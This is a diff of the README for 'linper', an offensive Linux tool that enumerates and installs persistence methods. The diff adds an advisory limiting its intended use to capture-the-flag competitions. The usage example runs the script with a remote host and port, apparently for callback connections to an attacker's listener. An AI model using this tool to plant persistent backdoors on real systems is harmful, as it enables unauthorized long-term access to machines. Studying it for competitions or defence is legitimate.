sodiptabadiabanurea/linper/README.md

 Automatically install multiple methods of persistence, or just enumerate possible methods.

+## advisory

+This was developed with CTFs in mind and that is its intended use case.
+The stealth-mode option is for King of the Hill style competitions where others might try and tamper with your persistence.
+Please do not use this tool in an unethical or illegal manner.

 ## files

 - README.md - or not
 - TODO.md - planned fixes & enhancements
-- linper.sh - execute on target
+- linper.sh - execute me
 - gtfobins/ - directory containing (possibly modified) snippets of code from [gtfobins](https://gtfobins.github.io/) as I am working on integrating them into the overall script

 ## usage

 Enumerate all persistence methods and install

-`bash linper.sh --rhost myc2.host.domain --rport 4444`
+`bash linper.sh --rhost 10.10.10.10 --rport 4444`

 Enumerate and do not install